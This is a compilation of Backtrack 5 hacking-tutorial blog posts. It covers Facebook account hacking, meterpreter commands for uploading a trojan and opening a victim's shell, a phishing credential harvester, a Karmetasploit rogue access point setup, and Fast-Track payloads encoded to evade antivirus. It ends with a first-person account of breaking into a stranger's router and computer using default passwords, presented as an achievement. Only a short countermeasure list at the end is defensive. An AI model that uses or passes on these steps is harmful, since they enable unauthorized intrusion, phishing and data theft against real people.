Backtrack 5 R3 Facebook Hacking Real!!!

Hi guys,
This video tutorials about Facebook hacking,now i show how to hack Facebook account using Backtrack r3

Don't forget to Join with us on

FACEBOOK FAN PAGE www.facebook.com/sundaravelit

Join Our Group for Help www.facebook.com/groups/hackinghelp

Keep visit for our More backtrack 5 r3 tutorials

Learn to use Metasploit – Tutorials, Docs & Videos

Metasploit is a great tool for hacking , but it’s not the easiest to use and some people get completely lost when trying to get the most out of it.

Here i am sharing  bunch of links,videos tutorials and documents to get you up to speed.
You can start with this, a good  Tutorial that shows you step by step how to use it
Metasploit at Iron Geek
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability.
There’s a presentation by HD Moore himself at Cansecwest 2006:
csw06-moore.pdf
And a couple of videos spawned from that here:
Computer defense – TASK Presentation
The most up to date video for Metasploit 3 can be found here:
Exploring Metasploit 3 and the New and Improved Web Interface – Part 1
Exploring Metasploit 3 and the New and Improved Web Interface – Part 2
The Metasploit site itself also has some fantastic documentation, a good place to start is here:
http://framework.metasploit.com/msf/support
The Metasploit book is a good start too:
Using Metasploit
The Security Focus article is a good reference too if a little outdated:
Metasploit Framework, Part 1
Metasploit Framework, Part 2
So get hacking, Metasploit is great!

Social Engineering toolkit Tutorial-Backtrack 5

Social engineering also known as human hack, social engineering is an act to manipulate human mind to get the desire goals. Social engineering is a general term and on daily life everyone implement it but usage of social engineering in hacking and penetration testing is little different. The main use of social engineering in hacking is to get the information, maintaining access and so on.

There are various social engineering tips and tricks available on the Internet beside these tips there is a social engineering toolkit available for implement computer based social engineering attack.

What Is Social Engineering Toolkit

In this article I will discuss about the usage of social engineering toolkit on backtrack 5 to hack a windows operating system, but before going to the actual tutorial I want to share the basic introduction of social engineering toolkit that would really help for the beginner.

The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu,Gnacktrack and other Linux distribution that are used for penetration testing.

Download

If you are using some other Linux distribution than use the command to get SET.

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

Social Engineering Toolkit Tutorial

Well for this tutorial I am using backtrack 5 and the tutorial will teach you a single method to own a computer by using SET toolkit while more SET tutorial will be post on later articles. For the best result I have made video tutorial so,

As I have said on the video that more command on the article so here is the necessary commands.

ps
The 'ps' command displays a list of running processes on the target.

meterpreter > ps

Download

meterpreter > download c:\\boot.ini

Upload

meterpreter > upload evil_trojan.exe c:\\windows\\system32

Execute

meterpreter > execute -f cmd.exe -i -H

shell

If you want to get the DOS screen of victim PC for downloading and upload your backdoor and other jobs use shell.

meterpreter > shell

Process 39640 created.

Channel 2 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Enjoy the article than drop your comments.

Credential Harvester Attack Method- SET Backtrack 5

Social engineering toolkit has played and is playing an important role in the field of information security and ethical hacking, social engineering means to take advantages of human weakness to hack a computer system or a server. Social engineering toolkit is a computer based software that are also available on backtrack 5.

Backtrack is not only a single Linux distribution that contain SET, other distributions like Gnacktrack, backbox also have SET. On social engineering toolkit tutorial we have learnt how to get meterpreter and shell access on a computer, in this tutorial I will explain you some harvester attack method.

 

What is Credential Harvester Attack Method 

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.

So for this tutorial I will integrate Mass Mailer Attack with credential harvester attack.

Requirement

• Operating system
• Social Engineering Toolkit
• A brain

Any operating system is applicable for this type of attack but I am using backtrack 5 for this attack, it is a good practice to make a video tutorial instead of images and text so here is the video tutorial of social engineering toolkit mass mailer attack with harvester attack method.

SET Video Tutorial

Autopwn Metasploit Backtrack 5- Postgresql Solved

Metasploit is one of the best database and a software that has a list of exploits for different softwares, nmap is the great network scanner tool and when we integrate Metasploit and nmap each other than we can create a wonderful combination that will really helpful in the process of penetration testing and ethical hacking.

Beside nmap we can also integrate nessus result into metasploit and this tutorial has discussed before but we got many comments and messages that postgresql is not working on Metasploit in Backtrack 5, so here is another video tutorial that will show you how to use postgresql server on Metasploit in backtrack 5.

The tutorial will also teach you about Metasploit autopwn by using nmap results. After thistutorial you can say that the problem of postgresql on Metasploit has solved.

Postgresql Metasploit Autopwn Backtrack Tutorial

Karmetasploit- Backtrack 5 Tutorial

Wireless communication is now become a need of networking, radio signals are unseen but they carry your information on the form of bits by using different modulation techniques. However security is very important for wireless network because it is more vulnerable. As discussed before about wireless security and rogue access point, in this article i will try to cover Karmetasploit.

Metasploit is now one of the best tool for penetration testing and the word Karmetasploit has driven from two words one is KARMA (KARMA Attacks Radioed Machines Automatically) and the other is Metasploit.  

So what is Karmetasploit? 

KARMA is a wireless client attack toolkit and the integration of Karma and metasploit is called Karmetasploit, in 2004 Dino A. Dai Zovi and Shane A. Macaulay did a presentation called "All your layer are belong to us" in that presentation they have described the insecurity of wireless access point and introduced the tool KARMA. This tool acts as wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.

The above passage gives the basic introduction of KARMA and about Metasploit your can learn from here.

Karmetasploit Tutorial

Configuration 

If you are not using backtrack 5 than you must have to install some dependencies like Aircrack-ng 

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install 

# airmon-ng start [wifi-interface]

For backtrack like backtrack5 follow the procedure

root@bt:/pentest/exploits/framework3# wget http://www.offensive-security.com/downloads/karma.rc

Now here is the need to configure DHCP server so that the Fake AP connect with the network.

root@bt:/pentest/exploits/framework3# cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
  range 10.0.0.100 10.0.0.254;
  option routers 10.0.0.1;
  option domain-name-servers 10.0.0.1;
}

root@bt:~# gem install activerecord sqlite3-ruby

By we approx done now the time to restart the wireless interface and start listening.

root@bt:~# airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1

What this commands do? These command is used to create a new interface that is rogue interface or fake AP, now we have to assign IP address and DHCP configuration so the interface work properly.

root@bt:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0root@bt:~# ps aux | grep dhcpd

Karmetasploit Attack Vector 

After configuration you are ready to run karmetasploit and start an attack 

root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc 

The command will start metasploit and than Karma script start to act as a fake AP and it will give you the command like this 

msf auxiliary(http) >

When the victim will start using this AP you are free to monitor all the activities and you can record of the confidential information.

msf auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)

This is little advance tutorial and if you dont understand it than it means you have to understandrogue access point first.

Metasploit 4 Advance Penetration Testing Tool

Metasploit has changed the way of Penetration testing it provides complete automatic environment to attack, finding vulnerability and their exploits. As discuss before the advantages of automated penetration testing, for automated test metasploit is the best tool. You can find the complete description with basic usage of metasploit here.

The newer version of metasploit is version 4 that will release very soon so in this article i will try to discuss the features of metasploit 4.

According to the official blog the new version contain 36 new exploits, 27 new post-exploitation modules and 12 auxiliary modules. The new version also contain the exploits for browsers like Firefox and Internet explorer, improved 64-bit Linux payload. Some more features are:  

• Increased exploitation speed
• Updated social engineering campaigns, including the ability to clone existing websites and edit HTML in a rich editor
• Updated user interface to simplify managing large projects
• Easily re-run tasks that have been aborted by the user
• Global settings for configuring NeXpose scan engines, macros, and API keys

The new version will provides the advance option for import different scan results from third party web application scanners and vulnerability assessment tools. If you want to import result of nessus into metasploit than follow the link to learn.

The metasploit 4 also provides offline password cracking function, for this purpose metasploit will use john the ripper for cracking weak passwords. You can even Integrate Metasploit Pro with your Security Information and Event Management (SIEM).

There are various ways to deploy metasploit like you can now deploy Metasploit as a VMware image using VMware vSphere. Session establishment is not a big problem now, Meterpreter now supports persistent agents and listeners so that the target machine actively re-establishes a session when it drops. Agents automatically expire after a pre-configured amount of time.

Fast Track Hacking-Backtrack5 Tutorial

Backtrack 5 contains different tools for exploitation, as discussed before about metasploit and armitage for this article i will discuss about fast track, however I have received different request to write more tutorial for armitage, i will write for armitage too later. Fast Track is a compilation of custom developed tools that allow penetration testers the ease of advanced penetration techniques in a relatively easy manner.

Some of these tools utilize the Metasploit framework in order to successfully create payloads, exploit systems, or interface within compromised systems.

If you are beginner and dont have any idea about vulnerability, payload and shell code than first read the article " Introduction to metasploit". 

For this tutorial i will use backtrack 5, however you can use some other version(s). 

How To Use Fast-Track For Payload Generation

There are three interface available for fast track on backtrack 5, i will show you how to generate payload by using fast track, you can use fast track web interface too for different purposes like auto-pwn. Follow the procedure.

• Click on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive
• You will get the first window that is menu windows, enter number 8 that is payload generator number.

• On the next window will ask you about payload enter number 2 that is "Reverse_TCP Meterpreter".

• Now we need to encode our payload so that it can easily bypass antivirus software's and IDS. I enter number 2 you can enter of your choice.

• On the next we have to enter IP address of the victim than port number, I have scanned my local network using nmap, you can do this click here to learn nmap. Then select the type of payload either EXE or shell code.

• Now a file name payload.exe has been created, you can get the file by going on filesystem-->pentest>exploit-->fasttrack-->payload.exe.

• Use some social engineering technique to run this payload on the victim box than on the fast-track window start listing your payload to get the hack done. When everything is fine you will get the command window of the victim.

Integrate Nessus With Metasploit- Tutorial

There are so many tools but the importance of Nessus as avulnerability scanner is not hidden, and the metasploit master of all the tools that contain the available exploit makes it so important for penetration testing and for hacking, as discussed before about integration of nmap into nessus click here to learn.

This time we have decided to write on to use metasploit on the basis of nessus result, you can use your Linux box (recommended) as well as windows box, backtrack5 is available so if you are doing practice onbacktrack machine than it is good, while I am using ubuntu for this tutorial.

This tutorial is linked with the previous tutorial in which I have shown you how to use nessus now I am suppose that you have a result on your nessus, so start metasploit,

$ msfconsole

In this process we make Nessus Bridge for Metasploit, so on the metasploit type.

msf > load nessus

After successfully login the plugin you need to run and import the result of nessus into metasploit, so first of all we have to connect our nessus server with metasploit here is the command,

msf > nessus_connect username:password@hostname:port

msf > nessus_connect ehacking:irfan@127.0.0.1:8834

After successful authentication you can check the status of your nessus scan, you can check the policy, you can pause and resume the scan, you can view add and delete user and in general you can do anything that you can do with nessus window.

If you want to check the server status than type

msf > nessus_server_status

Now come to the main objective of the article, below command is for check all the reports

msf > nessus_report_list 

If you want to know about the host from the report, 

msf > nessus_report_hosts <report id>
msf > nessus_report_hosts a6656thy45ehacking

If there is a need to find out the information from a particular host use the command below.

msf > nessus_report_host_ports <hostname> <report id>

msf > nessus_report_host_ports 192.168.1.1 a6656thy45ehacking

You can do a lot of different things from Nessus Bridge for Metasploit just type the command to know more about it.

msf > nessus_help

How I Hacked A Remote Computer By Just IP Address

Hacking a remote computer is always a hot topic among hackers and crackers, a newbie hacker or someone who wants to learn hacking always ask these questions that how to hack into a computer by just knowing the IP address. Although we have discussed so many methods before and I always insist to learn some basic commands, protocols and their usage. This is my story like I have hacked into a remote by just using IP address (I have not downloaded any file even I have not cleared the logs). This story was not planned it just happened and I am sure you will like it and you will learn a lot of things if you don't know the basic commands and protocols.

It was Saturday night and I was working hard on social engineering toolkit remote attack (WAN,Internet attack) that is why I was playing with my router for port forwarding and other stuffs, remember my ISP using a dynamic mechanism so I have created DNS server to get the static IP. It was almost night and I have decided to get some sleep and than I have saved my browser tabs so that next time I will use them.

Its Sunday evening I have opened my browser and the previous tabs open automatically and then I got pop up window it asked about the user-name and password of my router I have looked to the address bar the IP address was same as it was saved by me, I was shocked that my ISP has not changed my WAN IP (remember ISP using dynamic IP), after this I have open a website about whatismyip and I have seen that my IP is different it means the window that ask about user name and password is the IP of another computer.

Just got an idea why not to brute force it and get the access on the victim router, hydra has been discussed before, but before brute force I have decided to use guessing technique and I than I have entered so many combination but failed than I just used the default user name and password huurraaah I was in.

Security was very low, than I did a quick nmap scan to get the open ports (remember I have turned off the firewall of victim router). According to the nmap result ftp and telnet was open and then I realized how vulnerable this victim is.

I came across to my terminal and open telnet to the victim by using the default password and I was in and now I was able to take control of this computer but this was not include in the plan.

FTP (file transfer protocol), I came to my terminal again and this time I have used FTP command with the same combination of user name and password and successful. Remember FTP access means you can download and upload files on remote computer means full access. You can use some GUI ftp client but I used command.

Countermeasure

• Always use a strong password
• Turn on your Firewall (both on router and computer)